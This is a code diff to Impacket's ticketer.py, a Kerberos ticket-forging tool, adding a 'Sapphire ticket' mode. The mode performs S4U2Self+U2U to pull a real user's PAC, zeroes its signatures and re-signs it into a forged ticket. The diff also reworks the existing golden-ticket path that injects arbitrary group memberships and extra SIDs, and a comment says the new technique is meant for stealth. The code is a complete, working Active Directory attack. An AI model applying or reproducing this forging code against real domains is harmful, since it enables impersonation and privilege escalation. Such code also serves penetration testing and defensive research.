@@ -1,7 +1,9 @@
 #!/usr/bin/python
 # Impacket - Collection of Python classes for working with network protocols.
 #
-# Copyright (C) 2023 Fortra. All rights reserved.
+# Copyright Fortra, LLC and its affiliated companies 
+#
+# All rights reserved.
 #
 # This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
@@ -50,10 +52,12 @@ import datetime
 import logging
 import random
 import string
+import struct
 import sys
 from calendar import timegm
 from time import strptime
 from binascii import unhexlify
+from six import b
 
 from pyasn1.codec.der import encoder, decoder
 from pyasn1.type.univ import noValue
@@ -64,7 +68,7 @@ from impacket.dcerpc.v5.ndr import NDRULONG
 from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \
     SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD
 from impacket.examples import logger
-from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart
+from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart, AD_IF_RELEVANT
 from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \
     PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \
     KERB_NON_KERB_CKSUM_SALT
@@ -78,6 +82,12 @@ from impacket.krb5.pac import KERB_SID_AND_ATTRIBUTES, PAC_SIGNATURE_DATA, PAC_I
 from impacket.krb5.types import KerberosTime, Principal
 from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
 
+from impacket.krb5 import constants, pac
+from impacket.krb5.asn1 import AP_REQ, TGS_REQ, Authenticator, seq_set, seq_set_iter, PA_FOR_USER_ENC, Ticket as TicketAsn1
+from impacket.krb5.crypto import _HMACMD5, _AES256CTS, string_to_key
+from impacket.krb5.kerberosv5 import sendReceive
+from impacket.krb5.types import Ticket
+from impacket.winregistry import hexdump
 
 class TICKETER:
     def __init__(self, target, password, domain, options):
@@ -85,6 +95,8 @@ class TICKETER:
         self.__target = target
         self.__domain = domain
         self.__options = options
+        self.__tgt = None
+        self.__tgt_session_key = None
         if options.spn:
             spn = options.spn.split('/')
             self.__service = spn[0]
@@ -126,7 +138,7 @@ class TICKETER:
         # 1) KERB_VALIDATION_INFO
         kerbdata = KERB_VALIDATION_INFO()
 
-        aTime = timegm(datetime.datetime.utcnow().timetuple())
+        aTime = timegm(datetime.datetime.now(datetime.timezone.utc).timetuple())
         unixTime = self.getFileTime(aTime)
 
         kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
@@ -327,6 +339,7 @@ class TICKETER:
             tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
                                                                     unhexlify(lmhash), unhexlify(nthash), None,
                                                                     self.__options.dc_ip)
+            self.__tgt, self.__tgt_cipher, self.__tgt_session_key = tgt, cipher, sessionKey
             if self.__domain == self.__server:
                 kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]
             else:
@@ -377,7 +390,7 @@ class TICKETER:
                 return None, None
             kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
             kdcRep['cname']['name-string'] = noValue
-            kdcRep['cname']['name-string'][0] = self.__target
+            kdcRep['cname']['name-string'][0] = self.__options.impersonate or self.__target
 
         else:
             logging.info('Creating basic skeleton ticket and PAC Infos')
@@ -445,152 +458,376 @@ class TICKETER:
 
         return kdcRep, pacInfos
 
+
+    def getKerberosS4U2SelfU2U(self):
+        tgt = self.__tgt
+        cipher = self.__tgt_cipher
+        sessionKey = self.__tgt_session_key
+        kdcHost = self.__options.dc_ip
+
+        decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        # Extract the ticket from the TGT
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        apReq = AP_REQ()
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] = constants.encodeFlags(opts)
+        seq_set(apReq, 'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = str(decodedTGT['crealm'])
+
+        clientName = Principal()
+        clientName.from_asn1(decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.now(datetime.timezone.utc)
+        authenticator['cusec'] = now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('AUTHENTICATOR')
+            print(authenticator.prettyPrint())
+            print('\n')
+
+        encodedAuthenticator = encoder.encode(authenticator)
+
+        # Key Usage 7
+        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+        # TGS authenticator subkey), encrypted with the TGS session
+        # key (Section 5.5.1)
+        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+
+        tgsReq['pvno'] = 5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service
+        # requests a service ticket to itself on behalf of a user. The user is
+        # identified to the KDC by the user's name and realm.
+        clientName = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+
+        S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_PRINCIPAL.value)
+        S4UByteArray += b(self.__options.impersonate) + b(self.__domain) + b'Kerberos'
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('S4UByteArray')
+            hexdump(S4UByteArray)
+
+        # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
+        # with the following three parameters: the session key of the TGT of
+        # the service performing the S4U2Self request, the message type value
+        # of 17, and the byte array S4UByteArray.
+        checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('CheckSum')
+            hexdump(checkSum)
+
+        paForUserEnc = PA_FOR_USER_ENC()
+        seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
+        paForUserEnc['userRealm'] = self.__domain
+        paForUserEnc['cksum'] = noValue
+        paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
+        paForUserEnc['cksum']['checksum'] = checkSum
+        paForUserEnc['auth-package'] = 'Kerberos'
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('PA_FOR_USER_ENC')
+            print(paForUserEnc.prettyPrint())
+
+        encodedPaForUserEnc = encoder.encode(paForUserEnc)
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
+        tgsReq['padata'][1]['padata-value'] = encodedPaForUserEnc
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        opts = list()
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
+        opts.append(constants.KDCOptions.canonicalize.value)
+        opts.append(constants.KDCOptions.renewable_ok.value)
+        opts.append(constants.KDCOptions.enc_tkt_in_skey.value)
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+
+        serverName = Principal(self.__options.user, self.__options.domain, type=constants.PrincipalNameType.NT_UNKNOWN.value)
+
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = str(decodedTGT['crealm'])
+
+        now = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                     (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))
+
+        seq_set_iter(reqBody, 'additional-tickets', (ticket.to_asn1(TicketAsn1()),))
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('Final TGS')
+            print(tgsReq.prettyPrint())
+
+        message = encoder.encode(tgsReq)
+        r = sendReceive(message, self.__domain, kdcHost)
+        return r, None, sessionKey, None
+
+
     def customizeTicket(self, kdcRep, pacInfos):
         logging.info('Customizing ticket for %s/%s' % (self.__domain, self.__target))
-        encTicketPart = EncTicketPart()
 
-        flags = list()
-        flags.append(TicketFlags.forwardable.value)
-        flags.append(TicketFlags.proxiable.value)
-        flags.append(TicketFlags.renewable.value)
-        if self.__domain == self.__server:
-            flags.append(TicketFlags.initial.value)
-        flags.append(TicketFlags.pre_authent.value)
-        encTicketPart['flags'] = encodeFlags(flags)
-        encTicketPart['key'] = noValue
-        encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
+        ticketDuration = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(hours=int(self.__options.duration))
 
-        if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
-            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
-        elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
-            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
-        else:
-            encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
+        if self.__options.impersonate:
+            # Doing Sapphire Ticket
+            # todo : in its actual form, ticketer is limited to the PAC structures that are supported in impacket.
+            #  Unsupported structures will be ignored. The PAC is not completely copy-pasted here.
 
-        encTicketPart['crealm'] = self.__domain.upper()
-        encTicketPart['cname'] = noValue
-        encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
-        encTicketPart['cname']['name-string'] = noValue
-        encTicketPart['cname']['name-string'][0] = self.__target
+            # 1. S4U2Self + U2U
+            logging.info('\tRequesting S4U2self+U2U to obtain %s\'s PAC' % self.__options.impersonate)
+            tgs, cipher, oldSessionKey, sessionKey = self.getKerberosS4U2SelfU2U()
 
-        encTicketPart['transited'] = noValue
-        encTicketPart['transited']['tr-type'] = 0
-        encTicketPart['transited']['contents'] = ''
+            # 2. extract PAC
+            logging.info('\tDecrypting ticket & extracting PAC')
+            decodedTicket = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
+            cipherText = decodedTicket['ticket']['enc-part']['cipher']
+            newCipher = _enctype_table[int(decodedTicket['ticket']['enc-part']['etype'])]
+            plainText = newCipher.decrypt(self.__tgt_session_key, 2, cipherText)
+            encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
 
-        encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
-        encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
-        # Let's extend the ticket's validity a lil bit
-        ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
-        encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
-        encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
-        encTicketPart['authorization-data'] = noValue
-        encTicketPart['authorization-data'][0] = noValue
-        encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value
-        encTicketPart['authorization-data'][0]['ad-data'] = noValue
+            # Let's extend the ticket's validity a lil bit
+            # I don't think this part should be left in the code. The whole point of doing a sapphire ticket is stealth, extending ticket duration is not the way to go
+            # encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
+            # encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
 
-        # Let's locate the KERB_VALIDATION_INFO and Checksums
-        if PAC_LOGON_INFO in pacInfos:
-            data = pacInfos[PAC_LOGON_INFO]
-            validationInfo = VALIDATION_INFO()
-            validationInfo.fromString(pacInfos[PAC_LOGON_INFO])
-            lenVal = len(validationInfo.getData())
-            validationInfo.fromStringReferents(data, lenVal)
+            # Opening PAC
+            adIfRelevant = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[0]
+            pacType = pac.PACTYPE(adIfRelevant[0]['ad-data'].asOctets())
+            pacInfos = dict()
+            buff = pacType['Buffers']
 
-            aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ'))
+            # clearing the signatures so that we can sign&encrypt later on
+            AttributesInfoPacInS4UU2UPAC = False
+            RequestorInfoPacInS4UU2UPAC = False
+            logging.info("\tClearing signatures")
+            for bufferN in range(pacType['cBuffers']):
+                infoBuffer = pac.PAC_INFO_BUFFER(buff)
+                data = pacType['Buffers'][infoBuffer['Offset'] - 8:][:infoBuffer['cbBufferSize']]
+                buff = buff[len(infoBuffer):]
+                if infoBuffer['ulType'] in [PAC_SERVER_CHECKSUM, PAC_PRIVSVR_CHECKSUM]:
+                    checksum = PAC_SIGNATURE_DATA(data)
+                    if checksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
+                        checksum['Signature'] = '\x00' * 12
+                    elif checksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
+                        checksum['Signature'] = '\x00' * 12
+                    else:
+                        checksum['Signature'] = '\x00' * 16
+                    pacInfos[infoBuffer['ulType']] = checksum.getData()
+                elif infoBuffer['ulType'] == PAC_ATTRIBUTES_INFO:
+                    AttributesInfoPacInS4UU2UPAC = True
+                    pacInfos[infoBuffer['ulType']] = data
+                elif infoBuffer['ulType'] == PAC_REQUESTOR_INFO:
+                    RequestorInfoPacInS4UU2UPAC = True
+                    pacInfos[infoBuffer['ulType']] = data
+                else:
+                    pacInfos[infoBuffer['ulType']] = data
 
-            unixTime = self.getFileTime(aTime)
+            # adding the Requestor and Attributes structures manually if they were not in the S4U2self+U2U ticket's PAC
+            if self.__options.old_pac is False and not AttributesInfoPacInS4UU2UPAC:
+                self.createAttributesInfoPac(pacInfos)
+            if self.__options.old_pac is False and not RequestorInfoPacInS4UU2UPAC:
+                if self.__options.user_id == "500":
+                    logging.warning("User ID is 500, which is Impacket's default. If you specified -user-id, you can ignore this message. "
+                        "If you didn't, and you get a KDC_ERR_TGT_REVOKED error when using the ticket, you will need to specify the -user-id "
+                        "with the RID of the target user to impersonate")
+                self.createRequestorInfoPac(pacInfos)
 
-            kerbdata = KERB_VALIDATION_INFO()
+            # changing ticket flags to match TGT / ST
+            logging.info("\tAdding necessary ticket flags")
+            originalFlags = [i for i, x in enumerate(list(encTicketPart['flags'].asBinary())) if x == '1']
+            flags = originalFlags
+            newFlags = [TicketFlags.forwardable.value, TicketFlags.proxiable.value, TicketFlags.renewable.value, TicketFlags.pre_authent.value]
+            if self.__domain == self.__server:
+                newFlags.append(TicketFlags.initial.value)
+            for newFlag in newFlags:
+                if newFlag not in originalFlags:
+                    flags.append(newFlag)
+            encTicketPart['flags'] = encodeFlags(flags)
 
-            kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
-            kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
-
-            # Let's adjust username and other data
-            validationInfo['Data']['LogonDomainName'] = self.__domain.upper()
-            validationInfo['Data']['EffectiveName'] = self.__target
-            # Our Golden Well-known groups! :)
-            groups = self.__options.groups.split(',')
-            validationInfo['Data']['GroupIds'] = list()
-            validationInfo['Data']['GroupCount'] = len(groups)
-
-            for group in groups:
-                groupMembership = GROUP_MEMBERSHIP()
-                groupId = NDRULONG()
-                groupId['Data'] = int(group)
-                groupMembership['RelativeId'] = groupId
-                groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
-                validationInfo['Data']['GroupIds'].append(groupMembership)
-
-            # Let's add the extraSid
-            if self.__options.extra_sid is not None:
-                extrasids = self.__options.extra_sid.split(',')
-                if validationInfo['Data']['SidCount'] == 0:
-                    # Let's be sure user's flag specify we have extra sids.
-                    validationInfo['Data']['UserFlags'] |= 0x20
-                    validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()
-                for extrasid in extrasids:
-                    validationInfo['Data']['SidCount'] += 1
-
-                    sidRecord = KERB_SID_AND_ATTRIBUTES()
-
-                    sid = RPC_SID()
-                    sid.fromCanonical(extrasid)
-
-                    sidRecord['Sid'] = sid
-                    sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
-
-                    # And, let's append the magicSid
-                    validationInfo['Data']['ExtraSids'].append(sidRecord)
+            # changing key type to match what the TGT we obtained
+            logging.info("\tChanging keytype")
+            encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
+            if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
+                encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
+            elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
+                encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
             else:
-                validationInfo['Data']['ExtraSids'] = NULL
+                encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
 
-            validationInfoBlob  = validationInfo.getData() + validationInfo.getDataReferents()
-            pacInfos[PAC_LOGON_INFO] = validationInfoBlob
-
-            if logging.getLogger().level == logging.DEBUG:
-                logging.debug('VALIDATION_INFO after making it gold')
-                validationInfo.dump()
-                print('\n')
         else:
-            raise Exception('PAC_LOGON_INFO not found! Aborting')
+            encTicketPart = EncTicketPart()
 
-        logging.info('\tPAC_LOGON_INFO')
+            flags = list()
+            flags.append(TicketFlags.forwardable.value)
+            flags.append(TicketFlags.proxiable.value)
+            flags.append(TicketFlags.renewable.value)
+            if self.__domain == self.__server:
+                flags.append(TicketFlags.initial.value)
+            flags.append(TicketFlags.pre_authent.value)
+            encTicketPart['flags'] = encodeFlags(flags)
+            encTicketPart['key'] = noValue
+            encTicketPart['key']['keytype'] = kdcRep['ticket']['enc-part']['etype']
 
-        # Let's now clear the checksums
-        if PAC_SERVER_CHECKSUM in pacInfos:
-            serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
-            if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
-                serverChecksum['Signature'] = '\x00' * 12
-            elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
-                serverChecksum['Signature'] = '\x00' * 12
+            if encTicketPart['key']['keytype'] == EncryptionTypes.aes128_cts_hmac_sha1_96.value:
+                encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
+            elif encTicketPart['key']['keytype'] == EncryptionTypes.aes256_cts_hmac_sha1_96.value:
+                encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(32)])
             else:
-                serverChecksum['Signature'] = '\x00' * 16
-            pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
-        else:
-            raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
+                encTicketPart['key']['keyvalue'] = ''.join([random.choice(string.ascii_letters) for _ in range(16)])
 
-        if PAC_PRIVSVR_CHECKSUM in pacInfos:
-            privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
-            privSvrChecksum['Signature'] = '\x00' * 12
-            if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
-                privSvrChecksum['Signature'] = '\x00' * 12
-            elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
+            encTicketPart['crealm'] = self.__domain.upper()
+            encTicketPart['cname'] = noValue
+            encTicketPart['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
+            encTicketPart['cname']['name-string'] = noValue
+            encTicketPart['cname']['name-string'][0] = self.__target
+
+            encTicketPart['transited'] = noValue
+            encTicketPart['transited']['tr-type'] = 0
+            encTicketPart['transited']['contents'] = ''
+            encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.now(datetime.timezone.utc))
+            encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.now(datetime.timezone.utc))
+            # Let's extend the ticket's validity a lil bit
+            encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
+            encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
+            encTicketPart['authorization-data'] = noValue
+            encTicketPart['authorization-data'][0] = noValue
+            encTicketPart['authorization-data'][0]['ad-type'] = AuthorizationDataType.AD_IF_RELEVANT.value
+            encTicketPart['authorization-data'][0]['ad-data'] = noValue
+
+            # Let's locate the KERB_VALIDATION_INFO and Checksums
+            if PAC_LOGON_INFO in pacInfos:
+                data = pacInfos[PAC_LOGON_INFO]
+                validationInfo = VALIDATION_INFO()
+                validationInfo.fromString(pacInfos[PAC_LOGON_INFO])
+                lenVal = len(validationInfo.getData())
+                validationInfo.fromStringReferents(data, lenVal)
+
+                aTime = timegm(strptime(str(encTicketPart['authtime']), '%Y%m%d%H%M%SZ'))
+
+                unixTime = self.getFileTime(aTime)
+
+                kerbdata = KERB_VALIDATION_INFO()
+
+                kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff
+                kerbdata['LogonTime']['dwHighDateTime'] = unixTime >> 32
+
+                # Let's adjust username and other data
+                validationInfo['Data']['LogonDomainName'] = self.__domain.upper()
+                validationInfo['Data']['EffectiveName'] = self.__target
+                # Our Golden Well-known groups! :)
+                groups = self.__options.groups.split(',')
+                validationInfo['Data']['GroupIds'] = list()
+                validationInfo['Data']['GroupCount'] = len(groups)
+
+                for group in groups:
+                    groupMembership = GROUP_MEMBERSHIP()
+                    groupId = NDRULONG()
+                    groupId['Data'] = int(group)
+                    groupMembership['RelativeId'] = groupId
+                    groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
+                    validationInfo['Data']['GroupIds'].append(groupMembership)
+
+                # Let's add the extraSid
+                if self.__options.extra_sid is not None:
+                    extrasids = self.__options.extra_sid.split(',')
+                    if validationInfo['Data']['SidCount'] == 0:
+                        # Let's be sure user's flag specify we have extra sids.
+                        validationInfo['Data']['UserFlags'] |= 0x20
+                        validationInfo['Data']['ExtraSids'] = PKERB_SID_AND_ATTRIBUTES_ARRAY()
+                    for extrasid in extrasids:
+                        validationInfo['Data']['SidCount'] += 1
+
+                        sidRecord = KERB_SID_AND_ATTRIBUTES()
+
+                        sid = RPC_SID()
+                        sid.fromCanonical(extrasid)
+
+                        sidRecord['Sid'] = sid
+                        sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED
+
+                        # And, let's append the magicSid
+                        validationInfo['Data']['ExtraSids'].append(sidRecord)
+                else:
+                    validationInfo['Data']['ExtraSids'] = NULL
+
+                validationInfoBlob  = validationInfo.getData() + validationInfo.getDataReferents()
+                pacInfos[PAC_LOGON_INFO] = validationInfoBlob
+
+                if logging.getLogger().level == logging.DEBUG:
+                    logging.debug('VALIDATION_INFO after making it gold')
+                    validationInfo.dump()
+                    print('\n')
+            else:
+                raise Exception('PAC_LOGON_INFO not found! Aborting')
+
+            logging.info('\tPAC_LOGON_INFO')
+
+            # Let's now clear the checksums
+            if PAC_SERVER_CHECKSUM in pacInfos:
+                serverChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_SERVER_CHECKSUM])
+                if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
+                    serverChecksum['Signature'] = '\x00' * 12
+                elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
+                    serverChecksum['Signature'] = '\x00' * 12
+                else:
+                    serverChecksum['Signature'] = '\x00' * 16
+                pacInfos[PAC_SERVER_CHECKSUM] = serverChecksum.getData()
+            else:
+                raise Exception('PAC_SERVER_CHECKSUM not found! Aborting')
+
+            if PAC_PRIVSVR_CHECKSUM in pacInfos:
+                privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM])
                 privSvrChecksum['Signature'] = '\x00' * 12
+                if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value:
+                    privSvrChecksum['Signature'] = '\x00' * 12
+                elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value:
+                    privSvrChecksum['Signature'] = '\x00' * 12
+                else:
+                    privSvrChecksum['Signature'] = '\x00' * 16
+                pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
             else:
-                privSvrChecksum['Signature'] = '\x00' * 16
-            pacInfos[PAC_PRIVSVR_CHECKSUM] = privSvrChecksum.getData()
-        else:
-            raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
+                raise Exception('PAC_PRIVSVR_CHECKSUM not found! Aborting')
 
-        if PAC_CLIENT_INFO_TYPE in pacInfos:
-            pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])
-            pacClientInfo['ClientId'] = unixTime
-            pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()
-        else:
-            raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')
+            if PAC_CLIENT_INFO_TYPE in pacInfos:
+                pacClientInfo = PAC_CLIENT_INFO(pacInfos[PAC_CLIENT_INFO_TYPE])
+                pacClientInfo['ClientId'] = unixTime
+                pacInfos[PAC_CLIENT_INFO_TYPE] = pacClientInfo.getData()
+            else:
+                raise Exception('PAC_CLIENT_INFO_TYPE not found! Aborting')
 
-        logging.info('\tPAC_CLIENT_INFO_TYPE')
-        logging.info('\tEncTicketPart')
+            logging.info('\tPAC_CLIENT_INFO_TYPE')
+            logging.info('\tEncTicketPart')
 
         if self.__domain == self.__server:
             encRepPart = EncASRepPart()
@@ -603,10 +840,13 @@ class TICKETER:
         encRepPart['last-req'] = noValue
         encRepPart['last-req'][0] = noValue
         encRepPart['last-req'][0]['lr-type'] = 0
-        encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
+        encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.now(datetime.timezone.utc))
         encRepPart['nonce'] = 123456789
         encRepPart['key-expiration'] = KerberosTime.to_asn1(ticketDuration)
-        encRepPart['flags'] = encodeFlags(flags)
+        flags = []
+        for i in encTicketPart['flags']:
+            flags.append(i)
+        encRepPart['flags'] = flags
         encRepPart['authtime'] = str(encTicketPart['authtime'])
         encRepPart['endtime'] = str(encTicketPart['endtime'])
         encRepPart['starttime'] = str(encTicketPart['starttime'])
@@ -624,7 +864,6 @@ class TICKETER:
             encRepPart['sname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
             encRepPart['sname']['name-string'][1] = self.__server
             logging.info('\tEncTGSRepPart')
-
         return encRepPart, encTicketPart, pacInfos
 
     def signEncryptTicket(self, kdcRep, encASorTGSRepPart, encTicketPart, pacInfos):
@@ -900,6 +1139,9 @@ if __name__ == '__main__':
     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
     group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
                        'ommited it use the domain part (FQDN) specified in the target parameter')
+    parser.add_argument('-impersonate', action="store", help='Sapphire ticket. target username that will be impersonated (through S4U2Self+U2U)'
+                                                             ' for querying the ST and extracting the PAC, which will be'
+                                                             ' included in the new ticket')
 
     if len(sys.argv)==1:
         parser.print_help()
@@ -920,14 +1162,7 @@ if __name__ == '__main__':
     options = parser.parse_args()
 
     # Init the example's logger theme
-    logger.init(options.ts)
-
-    if options.debug is True:
-        logging.getLogger().setLevel(logging.DEBUG)
-        # Print the Library's installation path
-        logging.debug(version.getInstallationPath())
-    else:
-        logging.getLogger().setLevel(logging.INFO)
+    logger.init(options.ts, options.debug)
 
     if options.domain is None:
         logging.critical('Domain should be specified!')
@@ -951,6 +1186,47 @@ if __name__ == '__main__':
     else:
         password = options.password
 
+    if options.impersonate:
+        # args that can't be None: -aesKey, -domain-sid, -nthash, -request, -domain, -user, -password
+        # -user-id can't be None except if -old-pac is set
+        # args that can't be False: -request
+        missing_params = [
+            param_name
+            for (param, param_name) in
+            zip(
+                [
+                    options.request,
+                    options.aesKey, options.nthash,
+                    options.domain, options.user, options.password,
+                    options.domain_sid, options.user_id
+                ],
+                [
+                    "-request",
+                    "-aesKey", "-nthash",
+                    "-domain", "-user", "-password",
+                    "-domain-sid", "-user-id"
+                ]
+            )
+            if param is None or (param_name == "-request" and not param)
+        ]
+        if missing_params:
+            logging.error(f"missing parameters to do sapphire ticket : {', '.join(missing_params)}")
+            sys.exit(1)
+        if not options.old_pac and not options.user_id:
+            logging.error(f"missing parameter -user-id. Must be set if not doing -old-pac")
+            sys.exit(1)
+        # ignored params: -extra-pac, -extra-sid, -groups, -duration
+        # -user-id ignored if -old-pac
+        ignored_params = []
